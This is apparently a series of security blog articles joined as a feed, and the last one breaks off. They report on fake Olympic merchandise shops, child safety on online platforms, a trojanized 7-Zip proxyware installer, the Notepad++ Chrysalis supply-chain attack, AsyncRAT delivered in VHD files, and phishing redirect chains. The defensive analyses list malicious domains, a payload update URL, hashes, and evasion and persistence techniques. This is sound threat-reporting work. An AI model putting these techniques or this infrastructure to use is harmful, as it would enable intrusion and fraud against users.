Olympic merchandise is already being used as bait. We’ve identified nearly 20 fake shop sites targeting fans globally.

The post Fake shops target Winter Olympics 2026 fans appeared first on Security Boulevard.

If you’ve seen the two stoat siblings serving as official mascots of the Milano Cortina 2026 Winter Olympics, you already know Tina and Milo are irresistible.

Designed by Italian schoolchildren and chosen from more than 1,600 entries in a public poll, the duo has already captured hearts worldwide. So much so that the official 27 cm Tina plush toy on the official Olympics web shop is listed at €40 and currently marked out of stock.

Tina and Milo are in huge demand, and scammers have noticed.

When supply runs out, scam sites rush in

In roughly the past week alone, we’ve identified nearly 20 lookalike domains designed to imitate the official Olympic merchandise store.

These aren’t crude copies thrown together overnight. The sites use the same polished storefront template, complete with promotional videos and background music designed to mirror the official shop.olympics.com experience.

The layout and product pages are the same—the only thing that changes is the domain name. At a quick glance, most people wouldn’t notice anything unusual.

Here’s a sample of the domains we’ve been tracking:

2026winterdeals[.]top
olympics-save[.]top
olympics2026[.]top
postolympicsale[.]com
sale-olympics[.]top
shopolympics-eu[.]top
winter0lympicsstore[.]top (note the zero replacing the letter “o”)
winterolympics[.]top
2026olympics[.]shop
olympics-2026[.]shop
olympics-2026[.]top
olympics-eu[.]top
olympics-hot[.]shop
olympics-hot[.]top
olympics-sale[.]shop
olympics-sale[.]top
olympics-top[.]shop
olympics2026[.]store
olympics2026[.]top

Based on telemetry, additional registrations are actively emerging.

Reports show users checking these domains from multiple regions including Ireland, the Czech Republic, the United States, Italy, and China—suggesting this is a global campaign targeting fans worldwide.

Malwarebytes blocks these domains as scams.

Anatomy of a fake Olympic shop

The fake sites are practically identical. Each one loads the same storefront, with the same layout, product pages, and promotional banners.

That’s usually a sign the scammers are using a ready-made template and copying it across multiple domains. One obvious giveaway, however, is the pricing.

On the official store, the Tina plush costs €40 and is currently out of stock. On the fake sites, it suddenly reappears at a hugely discounted price—in one case €20, with banners shouting “UP & SAVE 80%.” When an item is sold out everywhere official and a random .top domain has it for half price, you’re looking at bait.

The goal of these sites typically includes:

• Stealing payment card details entered at checkout
• Harvesting personal information such as names, addresses, and phone numbers
• Sending follow-up phishing emails
• Delivering malware through fake order confirmations or “tracking” links
• Taking your money and shipping nothing at all

The Olympics are a scammer’s playground

This isn’t the first time cybercriminals have piggybacked on Olympic fever. Fake ticket sites proliferated as far back as the Beijing 2008 Games. During Paris 2024, analysts observed significant spikes in Olympics-themed phishing and DDoS activity.

The formula is simple. Take a globally recognized brand, add urgency and emotional appeal (who doesn’t want an adorable stoat plush for their kid?), mix in limited availability, and serve it up on a convincing-looking website. With over 3 billion viewers expected for Milano Cortina, the pool of potential victims is enormous.

Scammers are getting smarter. AI-powered tools now let them generate convincing phishing pages in multiple languages at scale. The days of spotting a scam by its broken images and multiple typos are fading fast.

Protect yourself from Winter Olympics scams

As excitement builds ahead of the Winter Olympics in Milano Cortina, expect scammers to ramp up their efforts across fake shops, fraudulent ticket sites, bogus livestreams, and social media phishing campaigns.

• Buy only from shop.olympics.com. Type the address directly into your browser and bookmark it. Don’t click links from ads or emails.
• Don’t trust extreme discounts. If it’s sold out officially but “50–80% off” elsewhere, it’s likely a scam.
• Check the domain closely. Watch for odd extensions like .top or .shop, extra hyphens, or letter swaps like “winter0lympicsstore.”
• Never enter payment details on unfamiliar sites. If something feels off, leave immediately.
• Use browser protection. Tools like Malwarebytes Browser Guard block known scam sites in real time, for free. Scam Guard can help you check suspicious websites before you buy.

---

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

When researchers created an account for a child under 13 on Roblox, they expected heavy guardrails. Instead, they found that the platform’s search features still allowed kids to discover communities linked to fraud and other illicit activity.

The discoveries spotlight the question that lawmakers around the world are circling: how do you keep kids safe online?

Australia has already acted, while the UK, France, and Canada are actively debating tighter rules around children’s use of social media. This month US Senator Ted Cruz reintroduced a bill to do it while also chairing a Congressional hearing about online kid safety.

Lawmakers have said these efforts are to keep kids safe online. But as the regulatory tide rises, we wanted to understand what digital safety for children actually looks like in practice.

So, we asked a specialist research team to explore how well a dozen mainstream tech providers are protecting children aged under 13 online.

We found that most services work well when kids use the accounts and settings designed for them. But when children are curious, use the wrong account type, or step outside those boundaries, things can go sideways quickly.

Over several weeks in December, the research team explored how platforms from Discord to YouTube handled children’s online use. They relied on standard user behavior rather than exploits or technical tricks to reflect what a child could realistically encounter.

The researchers focused on how platforms catered to kids through specific account types, how age restrictions were enforced in practice, and whether sensitive content was discoverable through normal browsing or search.

What emerged was a consistent pattern: curious kids who poke around a little, or who end up using the wrong account type, can run into inappropriate content with surprisingly little effort.

A detailed breakdown of the platforms tested, account types used, and where sensitive content was discovered appears in the research scope and methodology section at the end of this article.

When kids’ accounts are opt-in

One thing the team tried was to simply access the generic public version of a site rather than the kid-protected area.

This was a particular problem with YouTube. The company runs a kid-specific service called YouTube Kids, which the researchers said is effectively sanitized of inappropriate content (it sounds like things have changed since 2022).

The issue is that YouTube’s regular public site isn’t sanitized, and even though the company says you must be at least 13 to use the service unless ‘enabled’ by a parent, in reality anyone can access it. From the report:

“Some of the content will require signing in (for age verification) prior the viewing, but the minor can access the streaming service as a ‘Guest’ user without logging in, bypassing any filtering that would otherwise apply to a registered child account.”

That opens up a range of inappropriate material, from “how-to” fraud channels through to scenes of semi-nudity and sexually suggestive material, the researchers said. Horrifically, they even found scenes of human execution on the public site. The researchers concluded:

“The absence of a registration barrier on the public platform renders the ‘YouTube Kids’ protection opt-in rather than mandatory.”

When adult accounts are easy to fake

Another worry is that even when accounts are age-gated, enterprising minors can easily get around them. While most platforms require users to be 13+, a self-declaration is often enough. All that remains is for the child to register an email address with a service that doesn’t require age verification.

This “double blind” vulnerability is a big problem. Kids are good at creating accounts. The tech industry has taught them to be, because they need them for most things they touch online, from streaming to school.

When they do get past the age gates, curious kids can quickly get to inappropriate material. Researchers found unmoderated nudity and explicit material on the social network Discord, along with TikTok content providing credit card fraud and identity theft tutorials. A little searching on the streaming site Twitch surfaced ads for escort services.

This points to a trade-off between privacy and age verification. While stricter age verification could close some of these gaps, it requires collecting more personal data, including IDs or biometric information. That creates privacy risks of its own, especially for children. That’s why most platforms rely on self-declared age, but the research shows how easily that can be bypassed.

When kids’ accounts let toxic content through

Cracks in the moderation foundations allow risky content: Roblox, the website and app where users build their own content, filters chats for child accounts. However, it also features “Communities,” which are groups designed for socializing and discovery.

These groups are easily searchable, and some use names and terminology commonly linked to criminal activities, including fraud and identity theft. One, called “Fullz,” uses a term widely understood to refer to stolen personal information, and “new clothes” is often used to refer to a new batch of stolen payment card data. The visible community may serve as a gateway, while the actual coordination of illicit activity or data trading occurs via “inner chatter” between the community members.

This kind of search wasn’t just an issue for Roblox, warned the team. It found Instagram profiles promoting financial fraud and crypto schemes, even from a restricted teen account.

Some sites passed the team’s tests admirably, though. The researchers simulated underage users who’d bypassed age verification, but were unable to find any harmful content on Minecraft, Snapchat, Spotify, or Fortnite. Fortnite’s approach is especially strict, disabling chat and purchases on accounts for kids under 13 until a parent verifies via email. It also uses additional verification steps using a Social Security number or credit card. Kids can still play, but they’re muted.

What parents can do

There is no platform that can catch everything, especially when kids are curious. That makes parental involvement the most important layer of protection.

One reason this matters is a related risk worth acknowledging: adults attempting to reach children through social platforms. Even after Instagram took steps to limit contact between adult and child accounts, parents still discovered loopholes. This isn’t a failure of one platform so much as a reminder that no set of controls can replace awareness and involvement.

Mark Beare, GM of Consumer at Malwarebytes says:

“Parents are navigating a fast-moving digital world where offline consequences are quickly felt, be it spoofed accounts, deepfake content or lost funds. Safeguards exist and are encouraged, but children can still be exposed to harmful content.”

This doesn’t mean banning children from the internet. As the EFF points out, many minors use online services productively with the support and supervision of their parents. But it does mean being intentional about how accounts are set up, how children interact with others online, and how comfortable they feel asking for help.

Accounts and settings

• Use child or teen accounts where available, and avoid defaulting to adult accounts.
• Keep friends and followers lists set to private.
• Avoid using real names, birthdays, or other identifying details unless they are strictly required.
• Avoid facial recognition features for children’s accounts.
• For teens, be aware of “spam” or secondary accounts they’ve set up that may have looser settings.

Social behavior

• Talk to your child about who they interact with online and what kinds of conversations are appropriate.
• Warn them about strangers in comments, group chats, and direct messages.
• Encourage them to leave spaces that make them uncomfortable, even if they didn’t do anything wrong.
• Remind them that not everyone online is who they claim to be.

Trust and communication

• Keep conversations about online activity open and ongoing, not one-off warnings.
• Make it clear that your child can come to you if something goes wrong without fear of punishment or blame.
• Involve other trusted adults, such as parents, teachers, or caregivers, so kids aren’t navigating online spaces alone.

This kind of long-term involvement helps children make better decisions over time. It also reduces the risk that mistakes made today can follow them into the future, when personal information, images, or conversations could be reused in ways they never intended.

---

Research findings, scope and methodology 

This research examined how children under the age of 13 may be exposed to sensitive content when browsing mainstream media and gaming services. 

For this study, a “kid” was defined as an individual under 13, in line with the Children’s Online Privacy Protection Act (COPPA). Research was conducted between December 1 and December 17, 2025, using US-based accounts. 

The research relied exclusively on standard user behavior and passive observation. No exploits, hacks, or manipulative techniques were used to force access to data or content. 

Researchers tested a range of account types depending on what each platform offered, including dedicated child accounts, teen or restricted accounts, adult accounts created through age self-declaration, and, where applicable, public or guest access without registration. 

The study assessed how platforms enforced age requirements, how easy it was to misrepresent age during onboarding, and whether sensitive or illicit content could be discovered through normal browsing, searching, or exploration. 

Across all platforms tested, default algorithmic content and advertisements were initially benign and policy-compliant. Where sensitive content was found, it was accessed through intentional, curiosity-driven behavior rather than passive recommendations. No proactive outreach from other users was observed during the research period. 

The table below summarizes the platforms tested, the account types used, and whether sensitive content was discoverable during testing. 

Platform	Account type tested	Dedicated kid/teen account	Age gate easy to bypass	Illicit content discovered	Notes
YouTube (public)	No registration (guest)	Yes (YouTube Kids)	N/A	Yes	Public YouTube allowed access to scam/fraud content and violent footage without sign-in. Age-restricted videos required login, but much content did not.
YouTube Kids	Kid account	Yes	N/A	No	Separate app with its own algorithmic wall. No harmful content surfaced.
Roblox	All-age account (13+)	No	Not required	Yes	Child accounts could search for and find communities linked to cybercrime and fraud-related keywords.
Instagram	Teen account (13–17)	No	Not required	Yes	Restricted accounts still surfaced profiles promoting fraud and cryptocurrency schemes via search.
TikTok	Younger user account (13+)	Yes	Not required	No	View-only experience with no free search. No harmful content surfaced.
TikTok	Adult account	No	Yes	Yes	Search surfaced credit card fraud–related profiles and tutorials after age gate bypass.
Discord	Adult account	No	Yes	Yes	Public servers surfaced explicit adult content when searched directly. No proactive contact observed.
Twitch	Adult account	No	Yes	Yes	Discovered escort service promotions and adult content, some behind paywalls.
Fortnite	Cabined (restricted) account (13+)	Yes	Hard to bypass	No	Chat and purchases disabled until parent verification. No harmful content found.
Snapchat	Adult account	No	Yes	No	No sensitive content surfaced during testing.
Spotify	Adult account	Yes	Yes	No	Explicit lyrics labeled. No harmful content found.
Messenger Kids	Kid account	Yes	Not required	No	Fully parent-controlled environment. No search or external contacts.

Screenshots from the research

---

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

A convincing lookalike of the popular 7-Zip archiver site has been serving a trojanized installer that silently converts victims’ machines into residential proxy nodes—and it has been hiding in plain sight for some time.

“I’m so sick to my stomach”

A PC builder recently turned to Reddit’s r/pcmasterrace community in a panic after realizing they had downloaded 7‑Zip from the wrong website. Following a YouTube tutorial for a new build, they were instructed to download 7‑Zip from 7zip[.]com, unaware that the legitimate project is hosted exclusively at 7-zip.org.

In their Reddit post, the user described installing the file first on a laptop and later transferring it via USB to a newly built desktop. They encountered repeated 32‑bit versus 64‑bit errors and ultimately abandoned the installer in favor of Windows’ built‑in extraction tools. Nearly two weeks later, Microsoft Defender alerted on the system with a generic detection: Trojan:Win32/Malgent!MSR.

The experience illustrates how a seemingly minor domain mix-up can result in long-lived, unauthorized use of a system when attackers successfully masquerade as trusted software distributors.

A trojanized installer masquerading as legitimate software

This is not a simple case of a malicious download hosted on a random site. The operators behind 7zip[.]com distributed a trojanized installer via a lookalike domain, delivering a functional copy of functional 7‑Zip File Manager alongside a concealed malware payload.

The installer is Authenticode‑signed using a now‑revoked certificate issued to Jozeal Network Technology Co., Limited, lending it superficial legitimacy. During installation, a modified build of 7zfm.exe is deployed and functions as expected, reducing user suspicion. In parallel, three additional components are silently dropped:

• Uphero.exe—a service manager and update loader
• hero.exe—the primary proxy payload (Go‑compiled)
• hero.dll—a supporting library

All components are written to C:\Windows\SysWOW64\hero\, a privileged directory that is unlikely to be manually inspected.

An independent update channel was also observed at update.7zip[.]com/version/win-service/1.0.0.2/Uphero.exe.zip, indicating that the malware payload can be updated independently of the installer itself.

Abuse of trusted distribution channels

One of the more concerning aspects of this campaign is its reliance on third‑party trust. The Reddit case highlights YouTube tutorials as an inadvertent malware distribution vector, where creators incorrectly reference 7zip.com instead of the legitimate domain.

This shows how attackers can exploit small errors in otherwise benign content ecosystems to funnel victims toward malicious infrastructure at scale.

Execution flow: from installer to persistent proxy service

Behavioral analysis shows a rapid and methodical infection chain:

1. File deployment—The payload is installed into SysWOW64, requiring elevated privileges and signaling intent for deep system integration.

2. Persistence via Windows services—Both Uphero.exe and hero.exe are registered as auto‑start Windows services running under System privileges, ensuring execution on every boot.

3. Firewall rule manipulation—The malware invokes netsh to remove existing rules and create new inbound and outbound allow rules for its binaries. This is intended to reduce interference with network traffic and support seamless payload updates.

4. Host profiling—Using WMI and native Windows APIs, the malware enumerates system characteristics including hardware identifiers, memory size, CPU count, disk attributes, and network configuration. The malware communicates with iplogger[.]org via a dedicated reporting endpoint, suggesting it collects and reports device or network metadata as part of its proxy infrastructure.

Functional goal: residential proxy monetization

While initial indicators suggested backdoor‑style capabilities, further analysis revealed that the malware’s primary function is proxyware. The infected host is enrolled as a residential proxy node, allowing third parties to route traffic through the victim’s IP address.

The hero.exe component retrieves configuration data from rotating “smshero”‑themed command‑and‑control domains, then establishes outbound proxy connections on non‑standard ports such as 1000 and 1002. Traffic analysis shows a lightweight XOR‑encoded protocol (key 0x70) used to obscure control messages.

This infrastructure is consistent with known residential proxy services, where access to real consumer IP addresses is sold for fraud, scraping, ad abuse, or anonymity laundering.

Shared tooling across multiple fake installers

The 7‑Zip impersonation appears to be part of a broader operation. Related binaries have been identified under names such as upHola.exe, upTiktok, upWhatsapp, and upWire, all sharing identical tactics, techniques, and procedures:

• Deployment to SysWOW64
• Windows service persistence
• Firewall rule manipulation via netsh
• Encrypted HTTPS C2 traffic

Embedded strings referencing VPN and proxy brands suggest a unified backend supporting multiple distribution fronts.

Rotating infrastructure and encrypted transport

Memory analysis uncovered a large pool of hardcoded command-and-control domains using hero and smshero naming conventions. Active resolution during sandbox execution showed traffic routed through Cloudflare infrastructure with TLS‑encrypted HTTPS sessions.

The malware also uses DNS-over-HTTPS via Google’s resolver, reducing visibility for traditional DNS monitoring and complicating network-based detection.

Evasion and anti‑analysis features

The malware incorporates multiple layers of sandbox and analysis evasion:

• Virtual machine detection targeting VMware, VirtualBox, QEMU, and Parallels
• Anti‑debugging checks and suspicious debugger DLL loading
• Runtime API resolution and PEB inspection
• Process enumeration, registry probing, and environment inspection

Cryptographic support is extensive, including AES, RC4, Camellia, Chaskey, XOR encoding, and Base64, suggesting encrypted configuration handling and traffic protection.

Defensive guidance

Any system that has executed installers from 7zip.com should be considered compromised. While this malware establishes SYSTEM‑level persistence and modifies firewall rules, reputable security software can effectively detect and remove the malicious components. Malwarebytes is capable of fully eradicating known variants of this threat and reversing its persistence mechanisms. In high‑risk or heavily used systems, some users may still choose a full OS reinstall for absolute assurance, but it is not strictly required in all cases.

Users and defenders should:

• Verify software sources and bookmark official project domains
• Treat unexpected code‑signing identities with skepticism
• Monitor for unauthorized Windows services and firewall rule changes
• Block known C2 domains and proxy endpoints at the network perimeter

Researcher attribution and community analysis

This investigation would not have been possible without the work of independent security researchers who went deeper than surface-level indicators and identified the true purpose of this malware family.

• Luke Acha provided the first comprehensive analysis showing that the Uphero/hero malware functions as residential proxyware rather than a traditional backdoor. His work documented the proxy protocol, traffic patterns, and monetization model, and connected this campaign to a broader operation he dubbed upStage Proxy. Luke’s full write-up is available on his blog.
• s1dhy expanded on this analysis by reversing and decoding the custom XOR-based communication protocol, validating the proxy behavior through packet captures, and correlating multiple proxy endpoints across victim geolocations. Technical notes and findings were shared publicly on X (Twitter).
• Andrew Danis contributed additional infrastructure analysis and clustering, helping tie the fake 7-Zip installer to related proxyware campaigns abusing other software brands.

Additional technical validation and dynamic analysis were published by researchers at RaichuLab on Qiita and WizSafe Security on IIJ.

Their collective work highlights the importance of open, community-driven research in uncovering long-running abuse campaigns that rely on trust and misdirection rather than exploits.

Closing thoughts

This campaign demonstrates how effective brand impersonation combined with technically competent malware can operate undetected for extended periods. By abusing user trust rather than exploiting software vulnerabilities, attackers bypass many traditional security assumptions—turning everyday utility downloads into long‑lived monetization infrastructure.

Malwarebytes detects and blocks known variants of this proxyware family and its associated infrastructure.

Indicators of Compromise (IOCs)

File paths

• C:\Windows\SysWOW64\hero\Uphero.exe
• C:\Windows\SysWOW64\hero\hero.exe
• C:\Windows\SysWOW64\hero\hero.dll

File hashes (SHA-256)

• e7291095de78484039fdc82106d191bf41b7469811c4e31b4228227911d25027 (Uphero.exe)
• b7a7013b951c3cea178ece3363e3dd06626b9b98ee27ebfd7c161d0bbcfbd894 (hero.exe)
• 3544ffefb2a38bf4faf6181aa4374f4c186d3c2a7b9b059244b65dce8d5688d9 (hero.dll)

Network indicators

Domains:

• soc.hero-sms[.]co
• neo.herosms[.]co
• flux.smshero[.]co
• nova.smshero[.]ai
• apex.herosms[.]ai
• spark.herosms[.]io
• zest.hero-sms[.]ai
• prime.herosms[.]vip
• vivid.smshero[.]vip
• mint.smshero[.]com
• pulse.herosms[.]cc
• glide.smshero[.]cc
• svc.ha-teams.office[.]com
• iplogger[.]org

Observed IPs (Cloudflare-fronted):

• 104.21.57.71
• 172.67.160.241

Host-based indicators

• Windows services with image paths pointing to C:\Windows\SysWOW64\hero\
• Firewall rules named Uphero or hero (inbound and outbound)
• Mutex: Global\3a886eb8-fe40-4d0a-b78b-9e0bcb683fb7

---

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

When Rapid7 published its analysis of the Chrysalis backdoor linked to a compromise of Notepad++ update infrastructure, it raised understandable questions from customers and security teams. The investigation showed that attackers did not exploit a flaw in the application itself. Instead, they compromised the hosting infrastructure used to deliver updates, allowing a highly targeted group to selectively distribute a previously undocumented backdoor associated with the Lotus Blossom APT.

Subsequent reporting from outlets including BleepingComputer, The Register, SecurityWeek, and The Hacker News has helped clarify the scope of the incident. What’s clear is that this was a supply chain attack against distribution infrastructure, not source code. The attackers maintained access for months, redirected update traffic selectively, and limited delivery of the Chrysalis payload to specific targets, helping them stay hidden and focused on espionage rather than mass compromise.

What does the Notepad++ incident mean?

This incident highlights how modern supply chain attacks have evolved. Rather than targeting application code, attackers abused shared hosting infrastructure and weaknesses in update verification to quietly deliver malware. The broader takeaway is that supply chain risk now extends well beyond build systems and repositories. Update mechanisms, hosting providers, and distribution paths have become attractive targets, especially when they sit outside an organization’s direct control.

Was Notepad++ itself compromised?

Based on public statements from the Notepad++ maintainer and independent reporting, there is no evidence that the application’s source code or core development process was compromised. The risk stemmed from the update delivery infrastructure, reinforcing that even trusted software can become a delivery mechanism when upstream systems are abused.

Who was behind the Chrysalis backdoor & Notepad++ attack?

Rapid7 was the first to publish attribution linking this activity to Lotus Blossom, a Chinese state-aligned advanced persistent threat (APT) group. Based on our analysis, we assess with moderate confidence that this group is responsible for the Notepad++ infrastructure compromise and the deployment of the Chrysalis backdoor.

Lotus Blossom has been active since at least 2009 and is known for long-running espionage campaigns targeting government, telecommunications, aviation, critical infrastructure, and media organiations, primarily across Southeast Asia, and more recently, Latin America.

The tactics, tooling, and infrastructure used in this campaign - including the abuse of update infrastructure, the use of selective targeting, and the deployment of custom malware, are consistent with the group’s historical tradecraft. As with any attribution, this conclusion is based on observed behaviors and intelligence correlations, not a single, definitive indicator.

What should organizations do right now?

Based on what we know today, there are several immediate actions organizations should take:

• Check and update Notepad++ installations. Ensure any instances are running the latest version, which includes improved certificate and signature verification.

• Review historical telemetry. Even though attacker infrastructure has been taken down, organizations should scan logs and environments going back to October 2025 for indicators of compromise associated with this campaign.

• Hunt, don’t just scan. This activity was selective and low‑volume. Absence of alerts does not guarantee absence of compromise.

• Use available intelligence. Rapid7 Intelligence Hub customers have access to the Chrysalis campaign intelligence, along with follow‑up indicators provided by partners such as Kaspersky, to support targeted hunting across endpoints and network telemetry.

Why does this matter beyond Notepad++?

This incident is a case study in how trust is exploited in modern environments. The attackers didn’t rely on zero days or noisy malware. They abused update workflows, hosting relationships, and assumptions about trusted software. That same approach applies across countless tools and platforms used daily inside enterprise environments.

It also reinforces a broader trend we’ve seen over the last year: attackers are patient, selective, and focused on long‑term access rather than immediate impact. That has implications for detection strategies, incident response planning, and supply chain risk management.

What does this mean for software supply chain security?

For defenders, this incident reinforces several lessons:

• Supply chain security must include distribution and hosting infrastructure, not just source code.

• Update mechanisms should enforce strong signature and metadata validation by default.

• Shared hosting environments represent an often overlooked risk, especially for widely deployed tools.

• Trust in software must be continuously validated, not assumed.

The Chrysalis incident is not just about a single tool or a single campaign. It reflects a broader shift in how advanced threat actors think about access, persistence, and trust. Software supply chains are no longer just a development concern. They are an operational and security concern that extends into hosting providers, update mechanisms, and the assumptions organizations make about what is “safe.”

As attackers continue to favor selective targeting and long‑term access over noisy, large‑scale compromise, defenders need to adapt accordingly. That means moving beyond basic scanning, validating trust continuously, and treating update and distribution infrastructure as part of the attack surface.

Learn more: Watch the full Chrysalis debrief webinar

If you’d like to hear directly from the researchers behind this discovery, watch the full Chrysalis: Inside the Supply Chain Compromise of Notepad++ webinar, now available on BrightTALK. In this detailed session, Christian Beek (Senior Director, Threat Analytics) and Steve Edwards (Director, Threat Intel & Detection Engineering) walk through the full attack chain, from initial compromise to malware behavior, attribution to Lotus Blossom, and what organizations can do right now to assess exposure and strengthen supply chain security. [Watch Now]

Cybercriminals behind a campaign dubbed DEAD#VAX are taking phishing one step further by delivering malware inside virtual hard disks that pretend to be ordinary PDF documents. Open the wrong “invoice” or “purchase order” and you won’t see a document at all. Instead, Windows mounts a virtual drive that quietly installs AsyncRAT, a backdoor Trojan that allows attackers to remotely monitor and control your computer.

It’s a remote access tool, which means attackers gain remote hands‑on‑keyboard control, while traditional file‑based defenses see almost nothing suspicious on disk.

From a high-level view, the infection chain is long, but every step looks just legitimate enough on its own to slip past casual checks.

Victims receive phishing emails that look like routine business messages, often referencing purchase orders or invoices and sometimes impersonating real companies. The email doesn’t attach a document directly. Instead, it links to a file hosted on IPFS (InterPlanetary File System), a decentralized storage network increasingly abused in phishing campaigns because content is harder to take down and can be accessed through normal web gateways.

The linked file is named as a PDF and has the PDF icon, but is actually a virtual hard disk (VHD) file. When the user double‑clicks it, Windows mounts it as a new drive (for example, drive E:) instead of opening a document viewer. Mounting VHDs is perfectly legitimate Windows behavior, which makes this step less likely to ring alarm bells.

Inside the mounted drive is what appears to be the expected document, but it’s actually a Windows Script File (WSF). When the user opens it, Windows executes the code in the file instead of displaying a PDF.

After some checks to avoid analysis and detection, the script injects the payload—AsyncRAT shellcode—into trusted, Microsoft‑signed processes such as RuntimeBroker.exe, OneDrive.exe, taskhostw.exe, or sihost.exe. The malware never writes an actual executable file to disk. It lives and runs entirely in memory inside these legitimate processes, making detection and eventually at a later stage, forensics much harder. It also avoids sudden spikes in activity or memory usage that could draw attention.

For an individual user, falling for this phishing email can result in:

• Theft of saved and typed passwords, including for email, banking, and social media.
• Exposure of confidential documents, photos, or other sensitive files taken straight from the system.
• Surveillance via periodic screenshots or, where configured, webcam capture.
• Use of the machine as a foothold to attack other devices on the same home or office network.

How to stay safe

Because detection can be hard, it is crucial that users apply certain checks:

• Don’t open email attachments until after verifying, with a trusted source, that they are legitimate.
• Make sure you can see the actual file extensions. Unfortunately, Windows allows users to hide them. So, when in reality the file would be called invoice.pdf.vhd the user would only see invoice.pdf. To find out how to do this, see below.
• Use an up-to-date, real-time anti-malware solution that can detect malware hiding in memory.

Showing file extensions on Windows 10 and 11

To show file extensions in Windows 10 and 11:

• Open Explorer (Windows key + E)
• In Windows 10, select View and check the box for File name extensions.
• In Windows 11, this is found under View > Show > File name extensions.

Alternatively, search for File Explorer Options to uncheck Hide extensions for known file types.

For older versions of Windows, refer to this article.

---

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Last week we talked about an app that promises users they can make money testing games, or even just by scrolling through TikTok.

Imagine our surprise when we ended up on a site promoting that same Freecash app while investigating a “cloud storage” phish. We’ve all probably seen one of those. They’re common enough and according to recent investigation by BleepingComputer, there’s a

“large-scale cloud storage subscription scam campaign targeting users worldwide with repeated emails falsely warning recipients that their photos, files, and accounts are about to be blocked or deleted due to an alleged payment failure.”

Based on the description in that article, the email we found appears to be part of this campaign.

The subject line of the email is:

“{Recipient}. Your Cloud Account has been locked on Sat, 24 Jan 2026 09:57:55 -0500. Your photos and videos will be removed!”

This matches one of the subject lines that BleepingComputer listed.

And the content of the email:

“Payment Issue – Cloud Storage

Dear User,

We encountered an issue while attempting to renew your Cloud Storage subscription.

Unfortunately, your payment method has expired. To ensure your Cloud continues without interruption, please update your payment details.

Subscription ID: 9371188

Product: Cloud Storage Premium

Expiration Date: Sat,24 Jan-2026

If you do not update your payment information, you may lose access to your Cloud Storage, which may prevent you from saving and syncing your data such as photos, videos, and documents.

Update Payment Details {link button}

Security Recommendations:

• Always access your account through our official website
• Never share your password with anyone
• Ensure your contact and billing information are up to date”

The link in the email leads to  https://storage.googleapis[.]com/qzsdqdqsd/dsfsdxc.html#/redirect.html, which helps the scammer establish a certain amount of trust because it points to Google Cloud Storage (GCS). GCS is a legitimate service that allows authorized users to store and manage data such as files, images, and videos in buckets. However, as in this case, attackers can abuse it for phishing.

The redirect carries some parameters to the next website.

The feed.headquartoonjpn[.]com domain was blocked by Malwarebytes. We’ve seen it before in an earlier campaign involving an Endurance-themed phish.

After a few more redirects, we ended up at hx5.submitloading[.]com, where a fake CAPTCHA triggered the last redirect to freecash[.]com, once it was solved.

The end goal of this phish likely depends on the parameters passed along during the redirects, so results may vary.

Rather than stealing credentials directly, the campaign appears designed to monetize traffic, funneling victims into affiliate offers where the operators get paid for sign-ups or conversions.

BleepingComputer noted that they were redirected to affiliate marketing websites for various products.

“Products promoted in this phishing campaign include VPN services, little-known security software, and other subscription-based offerings with no connection to cloud storage.”

How to stay safe

Ironically, the phishing email itself includes some solid advice:

• Always access your account through our official website.
• Never share your password with anyone.

We’d like to add:

• Never click on links in unsolicited emails without verifying with a trusted source.
• Use an up-to-date, real-time anti-malware solution with a web protection component.
• Do not engage with websites that attract visitors like this.

Pro tip: Malwarebytes Scam Guard would have helped you identify this email as a scam and provided advice on how to proceed.

Redirect flow (IOCs)

storage.googleapis[.]com/qzsdqdqsd/dsfsdxc.html

feed.headquartoonjpn[.]com

revivejudgemental[.]com

hx5.submitloading[.]com

freecash[.]com

Update February 5, 2026

Almedia GmbH, the company behind the Freecash platform, reached out to us for information about the chain of redirects that lead to their platform. And after an investigation they notified us that:

“Following Malwarebytes’ reporting and the additional information they shared with us, we investigated the issue and identified an affiliate operating in breach of our policies. That partner has been removed from our network.

Almedia does not sell user data, and we take compliance, user trust, and responsible advertising seriously.”

---

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard, a feature of our mobile protection products. Submit a screenshot, paste suspicious content, or share a text or phone number, and we’ll tell you if it’s a scam or legit. Download Malwarebytes Mobile Security for iOS or Android and try it today!

“You’re invited!” 

It sounds friendly, familiar and quite harmless. But in a scam we recently spotted, that simple phrase is being used to trick victims into installing a full remote access tool on their Windows computers—giving attackers complete control of the system. 

What appears to be a casual party or event invitation leads to the silent installation of ScreenConnect, a legitimate remote support tool quietly installed in the background and abused by attackers. 

Here’s how the scam works, why it’s effective, and how to protect yourself. 

The email: A party invitation 

Victims receive an email framed as a personal invitation—often written to look like it came from a friend or acquaintance. The message is deliberately informal and social, lowering suspicion and encouraging quick action. 

In the screenshot below, the email arrived from a friend whose email account had been hacked, but it could just as easily come from a sender you don’t know.

So far, we’ve only seen this campaign targeting people in the UK, but there’s nothing stopping it from expanding elsewhere. 

Clicking the link in the email leads to a polished invitation page hosted on an attacker-controlled domain. 

The invite: The landing page that leads to an installer 

The landing page leans heavily into the party theme, but instead of showing event details, the page nudges the user toward opening a file. None of them look dangerous on their own, but together they keep the user focused on the “invitation” file: 

• A bold “You’re Invited!” headline 
• The suggestion that a friend had sent the invitation 
• A message saying the invitation is best viewed on a Windows laptop or desktop
• A countdown suggesting your invitation is already “downloading” 
• A message implying urgency and social proof (“I opened mine and it was so easy!”) 

Within seconds, the browser is redirected to download RSVPPartyInvitationCard.msi 

The page even triggers the download automatically to keep the victim moving forward without stopping to think. 

This MSI file isn’t an invitation. It’s an installer. 

The guest: What the MSI actually does 

When the user opens the MSI file, it launches msiexec.exe and silently installs ScreenConnect Client, a legitimate remote access tool often used by IT support teams.  

There’s no invitation, RSVP form, or calendar entry. 

What happens instead: 

• ScreenConnect binaries are installed under C:\Program Files (x86)\ScreenConnect Client\ 
• A persistent Windows service is created (for example, ScreenConnect Client 18d1648b87bb3023) 
• ScreenConnect installs multiple .NET-based components 
• There is no clear user-facing indication that a remote access tool is being installed 

From the victim’s perspective, very little seems to happen. But at this point, the attacker can now remotely access their computer. 

